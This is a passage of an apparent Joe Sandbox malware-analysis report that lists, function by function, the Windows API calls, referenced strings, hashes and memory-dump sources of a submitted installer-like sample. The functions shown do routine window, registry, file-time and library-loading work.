                                                                          • Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
                                                                          • Opcode Fuzzy Hash: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                          • Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                          Strings
                                                                          • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                          • API String ID: 3850602802-3720027226
                                                                          • Opcode ID: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                          • Instruction ID: 9b4fe9b07e62f64c95e3ed8797323406b80950c852a807cd7dd65319169fa691
                                                                          • Opcode Fuzzy Hash: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                          • Instruction Fuzzy Hash: 1111E3B06042506FD300AB699C81B5F7BA89B56309F45443BF984DF383D3798C18CBAE
                                                                          APIs
                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                          • GetFocus.USER32 ref: 004771FF
                                                                          • GetKeyState.USER32(0000007A), ref: 00477211
                                                                          • WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FocusMessageStateTextWaitWindow
                                                                          • String ID: Wnd=$%x
                                                                          • API String ID: 1381870634-2927251529
                                                                          • Opcode ID: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                          • Instruction ID: 1bcd60996d2698ed373ebf422e897d28d135c5275452f214efeb8338eb806bda
                                                                          • Opcode Fuzzy Hash: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                          • Instruction Fuzzy Hash: A611CA30604204AFC701EFA9DC41ADE77F8EB49704B9184F6F418E3252D73C6D10CA6A
                                                                          APIs
                                                                          • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
                                                                          • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$LocalSystem
                                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                          • API String ID: 1748579591-1013271723
                                                                          • Opcode ID: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                          • Instruction ID: 0ff0b3c23c5ed0256b313d7d525d52e9a24b5728abf6314cf281cf193483f13b
                                                                          • Opcode Fuzzy Hash: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                          • Instruction Fuzzy Hash: 4311F8A090C3909ED340DF2AC44432BBAE4AB89704F04892EF9D8D6381E779C948DB77
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                          • API String ID: 47109696-2631785700
                                                                          • Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                          • Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
                                                                          • Opcode Fuzzy Hash: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                          • Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
                                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
                                                                          Strings
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 00481F46
                                                                          • CSDVersion, xrefs: 00481F70
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 3677997916-1910633163
                                                                          • Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                          • Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
                                                                          • Opcode Fuzzy Hash: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                          • Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                          • API String ID: 1646373207-4063490227
                                                                          • Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                          • Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
                                                                          • Opcode Fuzzy Hash: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                          • Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                          • API String ID: 1646373207-260599015
                                                                          • Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                          • Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
                                                                          • Opcode Fuzzy Hash: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                          • Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                          • API String ID: 1646373207-834958232
                                                                          • Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                          • Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
                                                                          • Opcode Fuzzy Hash: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                          • Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E
                                                                          APIs
                                                                            • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                          • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                          • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2238633743-2683653824
                                                                          • Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                          • Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
                                                                          • Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                          • Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,?,00000000,?,0047C68D), ref: 0047C3C0
                                                                          • FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,?,00000000,?,0047C68D,00000000), ref: 0047C3DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                          • Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
                                                                          • Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                          • Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54
                                                                          APIs
                                                                            • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                            • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                          • GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CountErrorFileLastMoveTick
                                                                          • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                          • API String ID: 2406187244-2685451598
                                                                          • Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                          • Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
                                                                          • Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                          • Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00413D56
                                                                          • GetDesktopWindow.USER32 ref: 00413E0E
                                                                            • Part of subcall function 00418ED0: 6F58C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                            • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                          • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CursorDesktopWindow$Show
                                                                          • String ID:
                                                                          • API String ID: 2074268717-0
                                                                          • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                          • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                          • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                          • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString$FileMessageModuleName
                                                                          • String ID:
                                                                          • API String ID: 704749118-0
                                                                          • Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                          • Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
                                                                          • Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                          • Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                            • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                            • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                          • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                          • String ID:
                                                                          • API String ID: 855768636-0
                                                                          • Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                          • Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
                                                                          • Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                          • Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
                                                                          APIs
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
